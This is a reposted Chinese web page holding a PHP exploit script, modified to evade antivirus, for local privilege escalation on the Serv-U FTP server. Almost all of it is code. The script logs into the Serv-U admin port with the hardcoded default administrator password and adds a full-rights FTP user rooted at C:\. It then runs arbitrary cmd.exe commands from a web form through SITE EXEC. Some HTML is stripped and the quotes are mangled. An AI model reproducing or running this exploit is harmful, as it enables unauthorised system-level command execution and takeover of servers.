服务器

Serv-U All Version本地提升权限Exp10it Ver 1.5

PHP代码
  2. /** 
  3. 修改免杀版本 BY:CiKer 
  4. **/  
  5. //  
  6. //Codez begin  
  7. //  
  8. //判断magic_quotes_gpc的值  
  9.   
  10. set_time_limit(0);  
  11.   
  12. if (get_magic_quotes_gpc()) {  
  13.      $_GET = stripslashes_array($_GET);  
  14. }  
  15.   
  16.   
  17. //变量初始化  
  18. $addr = ‘127.0.0.1’;  
  19. $ftpport = 21;  
  20. $adminport = 43958;  
  21. $adminuser = ‘LocalAdministrator’;  
  22. $adminpass = ‘#l@$ak#.lk;0@P’;  
  23. $user = ‘110’;  
  24. $password = ‘110’;  
  25. $homedir = ‘C:\\'; 
  26. $dir = ‘C:\\WINNT\\System32\\‘; 
  27.  
  28.  
  29. //有改变则赋值 
  30. if ($_GET){ 
  31.      $addr = $_GET['addr'] ;  
  32.      $ftpport = $_GET['ftpport'] ; 
  33.      $adminport = $_GET['adminport'] ;  
  34.      $adminuser = $_GET['adminuser'] ; 
  35.      $adminpass = $_GET['adminpass'] ;  
  36.      $user = $_GET['user'] ; 
  37.      $password = $_GET['password'] ;  
  38.      $homedir = $_GET['homedir'] ; 
  39.      if ($_GET['dir']){  
  40.      $dir = $_GET['dir'] ; 
  41.      } 
  42. } 
  43. ?> 
  44.  
  45.  
  46.  
  47.  
  48.  
  49. -=<Serv-U All Version本地提升权限Exp10it Ver 1.5>=- 
  50.  
  51.  
  52. b {font-family : Verdana, sans-serif;font-size : 14px;} 
  53. body,td,p,pre { 
  54. font-family : Verdana, sans-serif;font-size : 12px; 
  55. } 
  56. input { 
  57.              font-family: "Verdana"; 
  58.              font-size: "11px"; 
  59.              BACKGROUND-COLOR: "#FFFFFF"; 
  60.              height: "18px"; 
  61.              border: "1px solid #666666"; 
  62.      } 
  63.  
  64.  
  65.  
  66.  
  67.  
  68. Serv-U All Version本地提升权限Exp10it Ver 1.5 


  69.  
  70. 添加Serv-U用户部分 

  71.  
  72. PHP_SELF']?>" method="get"> 
  73.  
  74. 主机IP:     "> 
  75. 主机Ftp端口:     "> 
  76. 主机Ftp管理端口:     "> 
  77. 主机Ftp管理用户:     "> 
  78. 主机Ftp管理密码:     "> 
  79. 添加的用户名:     "> 
  80. 添加的用户名密码:"> 
  81. 用户主目录(别忘了写"\"): "> 
  82.  
  83.  
  84.  
  85.  

  86.  
  87. 命令回显: 
  88.  
  89.  
  90.  
  91. //添加用户 
  92. if ($_GET['action']=="up"){ 
  93.      up($addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir); 
  94.      } 
  95.      ?> 

  96.  
  97. 执行命令部分
     
  98. PHP_SELF']?>" method="get"> 
  99.  
  100. 主机Ftp端口:     "> 
  101. 用户名:     "> 
  102. 用户名密码:"> 
  103. 系统路径(别忘了写"\"):"> 
  104. 执行的命令: cmd']?>"> 
  105.  
  106.  

  107.  
  108. 命令回显: 
  109.  
  110.  
  111.  
  112. //执行命令 
  113. if ($_GET['action']=="execute"){  
  114.      ftpcmd($ftpport,$user,$password,$dir,$_GET['cmd']); 
  115.      } 
  116. ?> 
  117.  

  118.  
  119. Copycenter (C) 2004 我非我 All centers Reserved. 免杀修改 BY:CiKer 从此Hacking的道路更宽敞了…
     
  120.  
  121.  
  122.  
  123.  
  124.  
  125.  
  126.  
  127. //添加用户主函数定义 
  128. function up($addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir){ 
  129.      $fp = fsockopen ("127.0.0.1", $adminport, $errno, $errstr, 8); 
  130.      if (!$fp) { 
  131.          echo "$errstr ($errno)
    \n";     
  132.          } else { 
  133.      fputs ($fp, "USER ".$adminuser.""); 
  134.      sleep (1); 
  135.      fputs ($fp, "PASS ".$adminpass.""); 
  136.      sleep (1); 
  137.      fputs ($fp, "SITE MAINTENANCE"); 
  138.      sleep (1); 
  139.      fputs ($fp, "-SETUSERSETUP"); 
  140.      fputs ($fp, "-IP=".$addr.""); 
  141.      fputs ($fp, "-PortNo=".$ftpport.""); 
  142.      fputs ($fp, "-User=".$user.""); 
  143.      fputs ($fp, "-Password=".$password.""); 
  144.      fputs ($fp, "-HomeDir=".$homedir.""); 
  145.      fputs ($fp, "-LoginMesFile="); 
  146.      fputs ($fp, "-Disable=0"); 
  147.      fputs ($fp, "-RelPaths=0"); 
  148.      fputs ($fp, "-NeedSecure=0"); 
  149.      fputs ($fp, "-HideHidden=0"); 
  150.      fputs ($fp, "-AlwaysAllowLogin=0"); 
  151.      fputs ($fp, "-ChangePassword=1"); 
  152.      fputs ($fp, "-QuotaEnable=0"); 
  153.      fputs ($fp, "-MaxUsersLoginPerIP=-1"); 
  154.      fputs ($fp, "-SpeedLimitUp=-1"); 
  155.      fputs ($fp, "-SpeedLimitDown=-1"); 
  156.      fputs ($fp, "-MaxNrUsers=-1"); 
  157.      fputs ($fp, "-IdleTimeOut=600"); 
  158.      fputs ($fp, "-SessionTimeOut=-1"); 
  159.      fputs ($fp, "-Expire=0"); 
  160.      fputs ($fp, "-RatioUp=1"); 
  161.      fputs ($fp, "-RatioDown=1"); 
  162.      fputs ($fp, "-RatiosCredit=0"); 
  163.      fputs ($fp, "-QuotaCurrent=0"); 
  164.      fputs ($fp, "-QuotaMaximum=0"); 
  165.      fputs ($fp, "-Maintenance=System"); 
  166.      fputs ($fp, "-PasswordType=Regular"); 
  167.      fputs ($fp, "-Ratios=None"); 
  168.      fputs ($fp, " Access=".$homedir."|RWAMELCDP"); 
  169.      fputs ($fp, "QUIT"); 
  170.      sleep (1); 
  171.      while (!feof($fp)) { 
  172.      echo fgets ($fp,128); 
  173.      } 
  174.  
  175.  
  176. } 
  177. } 
  178.  
  179.  
  180. //执行命令主函数定义 
  181. function ftpcmd($ftpport,$user,$password,$dir,$cmd){ 
  182.  
  183.  
  184. $conn_id = fsockopen ("127.0.0.1", $ftpport, $errno, $errstr, 8); 
  185.  
  186.  
  187. if (!$conn_id) { 
  188.      echo "$errstr ($errno)
    \n";     
  189. } else { 
  190.      fputs ($conn_id, "USER ".$user.""); 
  191.      sleep (1); 
  192.      fputs ($conn_id, "PASS ".$password.""); 
  193.      sleep (1); 
  194.      fputs ($conn_id, "SITE EXEC ".$dir."cmd.exe /c ".$cmd.""); 
  195.      fputs ($conn_id, "QUIT"); 
  196.      sleep (1); 
  197.      while (!feof($conn_id)) { 
  198.      echo fgets ($conn_id,128); 
  199.      } 
  200.      fclose($conn_id); 
  201. } 
  202. } 
  203.  
  204.  
  205. //去除转义字符 
  206. function stripslashes_array(&$array) { 
  207. while (list($key,$var) = each($array)) { 
  208. if ($key != ‘argc‘ && $key != ‘argv‘ && (strtoupper($key) != $key || ‘‘.intval($key) == "$key")) {  
  209.      if (is_string($var)) {  
  210.      $array[$key] = stripslashes($var);  
  211.      }  
  212.      if (is_array($var)) {  
  213.      $array[$key] = stripslashes_array($var);  
  214.      }  
  215. }  
  216. }  
  217. return $array;  
  218. }  
  219. ?>